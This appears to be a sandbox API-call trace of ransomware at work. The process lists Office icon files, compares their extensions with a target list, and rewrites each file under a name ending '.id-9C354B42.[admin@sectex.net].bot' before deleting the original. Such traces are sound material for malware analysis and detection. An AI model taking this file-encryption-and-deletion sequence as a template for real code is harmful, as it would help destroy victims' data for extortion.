	[0163.792] WriteFile (in: hFile=0x268, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x440, lpOverlapped=0x0) returned 1
	[0163.793] ReadFile (in: hFile=0x1b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.793] WriteFile (in: hFile=0x268, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.793] SetEndOfFile (hFile=0x268) returned 1
	[0163.793] CloseHandle (hObject=0x268) returned 1
	[0163.793] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.793] SetEndOfFile (hFile=0x1b4) returned 1
	[0163.795] CloseHandle (hObject=0x1b4) returned 1
	[0163.795] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.846] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssiteml.ico")) returned 1
	[0163.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO") returned 66
	[0163.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO") returned 66
	[0163.855] lstrlenW (lpString=".doc") returned 4
	[0163.855] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.855] lstrlenW (lpString=".docx") returned 5
	[0163.856] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0163.856] lstrlenW (lpString=".pdf") returned 4
	[0163.856] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.856] lstrlenW (lpString=".xls") returned 4
	[0163.856] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.856] lstrlenW (lpString=".xlsx") returned 5
	[0163.856] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0163.856] lstrlenW (lpString=".ppt") returned 4
	[0163.856] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO") returned 66
	[0163.856] lstrlenW (lpString=".zip") returned 4
	[0163.856] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.856] lstrlenW (lpString=".rar") returned 4
	[0163.856] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.857] lstrlenW (lpString=".bz2") returned 4
	[0163.857] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.857] lstrlenW (lpString=".7z") returned 3
	[0163.857] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO") returned 66
	[0163.857] lstrlenW (lpString=".dbf") returned 4
	[0163.857] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO") returned 66
	[0163.857] lstrlenW (lpString=".1cd") returned 4
	[0163.857] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO") returned 66
	[0163.857] lstrlenW (lpString=".jpg") returned 4
	[0163.857] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO") returned 66
	[0163.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO") returned 66
	[0163.857] lstrlenW (lpString=".doc") returned 4
	[0163.857] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.857] lstrlenW (lpString=".docx") returned 5
	[0163.857] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0163.857] lstrlenW (lpString=".pdf") returned 4
	[0163.857] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.857] lstrlenW (lpString=".xls") returned 4
	[0163.857] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.857] lstrlenW (lpString=".xlsx") returned 5
	[0163.857] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0163.857] lstrlenW (lpString=".ppt") returned 4
	[0163.857] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO") returned 66
	[0163.857] lstrlenW (lpString=".zip") returned 4
	[0163.857] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.857] lstrlenW (lpString=".rar") returned 4
	[0163.857] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.858] lstrlenW (lpString=".bz2") returned 4
	[0163.858] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.858] lstrlenW (lpString=".7z") returned 3
	[0163.858] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO") returned 66
	[0163.858] lstrlenW (lpString=".dbf") returned 4
	[0163.858] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO") returned 66
	[0163.858] lstrlenW (lpString=".1cd") returned 4
	[0163.858] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO") returned 66
	[0163.858] lstrlenW (lpString=".jpg") returned 4
	[0163.858] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.858] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0163.858] lstrlenW (lpString="SCDREQL.ICO") returned 11
	[0163.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdreql.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.859] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1078) returned 1
	[0163.859] CloseHandle (hObject=0x3e8) returned 1
	[0163.859] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdreql.ico")) returned 0x20
	[0163.859] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdreql.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdreql.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.859] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.859] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdreql.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.860] GetLastError () returned 0x0
	[0163.860] ReadFile (in: hFile=0x3e8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x436, lpOverlapped=0x0) returned 1
	[0163.862] WriteFile (in: hFile=0x37c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x440, lpOverlapped=0x0) returned 1
	[0163.863] ReadFile (in: hFile=0x3e8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.863] WriteFile (in: hFile=0x37c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0163.863] SetEndOfFile (hFile=0x37c) returned 1
	[0163.863] CloseHandle (hObject=0x37c) returned 1
	[0163.863] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.863] SetEndOfFile (hFile=0x3e8) returned 1
	[0163.865] CloseHandle (hObject=0x3e8) returned 1
	[0163.865] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.865] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdreql.ico")) returned 1
	[0163.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO") returned 65
	[0163.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO") returned 65
	[0163.866] lstrlenW (lpString=".doc") returned 4
	[0163.866] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.866] lstrlenW (lpString=".docx") returned 5
	[0163.866] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0163.866] lstrlenW (lpString=".pdf") returned 4
	[0163.866] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.866] lstrlenW (lpString=".xls") returned 4
	[0163.866] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.866] lstrlenW (lpString=".xlsx") returned 5
	[0163.866] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0163.866] lstrlenW (lpString=".ppt") returned 4
	[0163.866] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO") returned 65
	[0163.866] lstrlenW (lpString=".zip") returned 4
	[0163.866] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.866] lstrlenW (lpString=".rar") returned 4
	[0163.867] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.867] lstrlenW (lpString=".bz2") returned 4
	[0163.867] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.867] lstrlenW (lpString=".7z") returned 3
	[0163.867] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO") returned 65
	[0163.867] lstrlenW (lpString=".dbf") returned 4
	[0163.867] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO") returned 65
	[0163.867] lstrlenW (lpString=".1cd") returned 4
	[0163.867] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO") returned 65
	[0163.867] lstrlenW (lpString=".jpg") returned 4
	[0163.867] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO") returned 65
	[0163.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO") returned 65
	[0163.867] lstrlenW (lpString=".doc") returned 4
	[0163.867] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.867] lstrlenW (lpString=".docx") returned 5
	[0163.867] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0163.867] lstrlenW (lpString=".pdf") returned 4
	[0163.867] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.867] lstrlenW (lpString=".xls") returned 4
	[0163.867] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.867] lstrlenW (lpString=".xlsx") returned 5
	[0163.867] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0163.867] lstrlenW (lpString=".ppt") returned 4
	[0163.867] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO") returned 65
	[0163.867] lstrlenW (lpString=".zip") returned 4
	[0163.867] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.867] lstrlenW (lpString=".rar") returned 4
	[0163.867] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.867] lstrlenW (lpString=".bz2") returned 4
	[0163.868] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.868] lstrlenW (lpString=".7z") returned 3
	[0163.868] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO") returned 65
	[0163.868] lstrlenW (lpString=".dbf") returned 4
	[0163.868] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO") returned 65
	[0163.868] lstrlenW (lpString=".1cd") returned 4
	[0163.868] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO") returned 65
	[0163.868] lstrlenW (lpString=".jpg") returned 4
	[0163.868] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.868] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0163.868] lstrlenW (lpString="SCDREQS.ICO") returned 11
	[0163.868] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdreqs.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.871] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=2998) returned 1
	[0163.871] CloseHandle (hObject=0x3e8) returned 1
	[0163.871] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdreqs.ico")) returned 0x20
	[0163.871] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdreqs.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdreqs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.871] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.871] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdreqs.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.872] GetLastError () returned 0x0
	[0163.872] ReadFile (in: hFile=0x3e8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0163.874] WriteFile (in: hFile=0x37c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0163.874] ReadFile (in: hFile=0x3e8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.874] WriteFile (in: hFile=0x37c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0163.874] SetEndOfFile (hFile=0x37c) returned 1
	[0163.875] CloseHandle (hObject=0x37c) returned 1
	[0163.875] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.875] SetEndOfFile (hFile=0x3e8) returned 1
	[0163.877] CloseHandle (hObject=0x3e8) returned 1
	[0163.877] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.877] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdreqs.ico")) returned 1
	[0163.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO") returned 65
	[0163.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO") returned 65
	[0163.878] lstrlenW (lpString=".doc") returned 4
	[0163.878] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.878] lstrlenW (lpString=".docx") returned 5
	[0163.878] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0163.878] lstrlenW (lpString=".pdf") returned 4
	[0163.878] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.878] lstrlenW (lpString=".xls") returned 4
	[0163.878] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.878] lstrlenW (lpString=".xlsx") returned 5
	[0163.878] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0163.878] lstrlenW (lpString=".ppt") returned 4
	[0163.878] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO") returned 65
	[0163.878] lstrlenW (lpString=".zip") returned 4
	[0163.878] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.878] lstrlenW (lpString=".rar") returned 4
	[0163.878] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.878] lstrlenW (lpString=".bz2") returned 4
	[0163.878] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.878] lstrlenW (lpString=".7z") returned 3
	[0163.878] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO") returned 65
	[0163.878] lstrlenW (lpString=".dbf") returned 4
	[0163.878] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO") returned 65
	[0163.878] lstrlenW (lpString=".1cd") returned 4
	[0163.879] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO") returned 65
	[0163.879] lstrlenW (lpString=".jpg") returned 4
	[0163.879] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO") returned 65
	[0163.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO") returned 65
	[0163.879] lstrlenW (lpString=".doc") returned 4
	[0163.879] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.879] lstrlenW (lpString=".docx") returned 5
	[0163.879] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0163.879] lstrlenW (lpString=".pdf") returned 4
	[0163.879] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.879] lstrlenW (lpString=".xls") returned 4
	[0163.879] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.879] lstrlenW (lpString=".xlsx") returned 5
	[0163.879] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0163.879] lstrlenW (lpString=".ppt") returned 4
	[0163.879] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO") returned 65
	[0163.879] lstrlenW (lpString=".zip") returned 4
	[0163.879] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.879] lstrlenW (lpString=".rar") returned 4
	[0163.879] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.879] lstrlenW (lpString=".bz2") returned 4
	[0163.879] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.879] lstrlenW (lpString=".7z") returned 3
	[0163.879] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO") returned 65
	[0163.879] lstrlenW (lpString=".dbf") returned 4
	[0163.879] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO") returned 65
	[0163.879] lstrlenW (lpString=".1cd") returned 4
	[0163.879] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO") returned 65
	[0163.880] lstrlenW (lpString=".jpg") returned 4
	[0163.880] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.880] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0163.880] lstrlenW (lpString="SCDRESNL.ICO") returned 12
	[0163.880] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresnl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.880] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1078) returned 1
	[0163.880] CloseHandle (hObject=0x3e8) returned 1
	[0163.880] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresnl.ico")) returned 0x20
	[0163.881] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresnl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresnl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.881] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.881] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresnl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.882] GetLastError () returned 0x0
	[0163.882] ReadFile (in: hFile=0x3e8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x436, lpOverlapped=0x0) returned 1
